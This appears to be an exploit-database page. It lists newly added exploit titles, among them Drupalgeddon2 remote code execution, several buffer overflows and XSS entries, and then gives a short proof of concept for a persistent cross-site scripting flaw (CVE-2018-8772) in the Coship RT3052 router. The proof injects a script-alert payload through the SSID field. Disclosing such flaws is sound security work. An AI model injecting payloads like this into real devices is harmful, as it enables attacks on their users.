
14 changes to exploits/shellcodes PDFunite 0.41.0 - '.pdf' Local Buffer Overflow RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow VX Search 10.6.18 - 'directory' Local Buffer Overflow Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Easy File Sharing Web Server 7.2 - Stack Buffer Overflow Coship RT3052 Wireless Router - Persistent Cross-Site Scripting Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting Rvsitebuilder CMS - Database Backup Download Match Clone Script 1.0.4 - Cross-Site Scripting Kodi 17.6 - Persistent Cross-Site Scripting Lutron Quantum 2.0 - 3.2.243 - Information Disclosure WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
26 lines
No EOL
1 KiB
Text
26 lines
No EOL
1 KiB
Text
######################################################################################
|
|
# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS)
|
|
# Date: 2018-03-18
|
|
# Exploit Author: Sayan Chatterjee
|
|
# Vendor Homepage: http://en.coship.com/
|
|
# Category: Hardware (Wifi Router)
|
|
# Version: 4.0.0.48
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2018-8772
|
|
#######################################################################################
|
|
|
|
Proof of Concept
|
|
=================
|
|
URL: http://192.168.1.254 (Wifi Router Gateway)
|
|
Attack Vector : Network Name(SSID)
|
|
Payload : <script>alert("S@Y@N")</script>
|
|
|
|
Reproduction Steps:
|
|
------------------------------
|
|
1. Access the wifi router gateway [i.e, http://192.168.1.254]
|
|
2. Go to "Wireless Setting" -> "Basic"
|
|
3. Update "Network Name(SSID)" field with '<script>alert("S@Y@N")</script>'
|
|
4. Save the settings.
|
|
5. Go to "System Status" and you will be having "S@Y@N" popup.
|
|
|
|
####################################################################################### |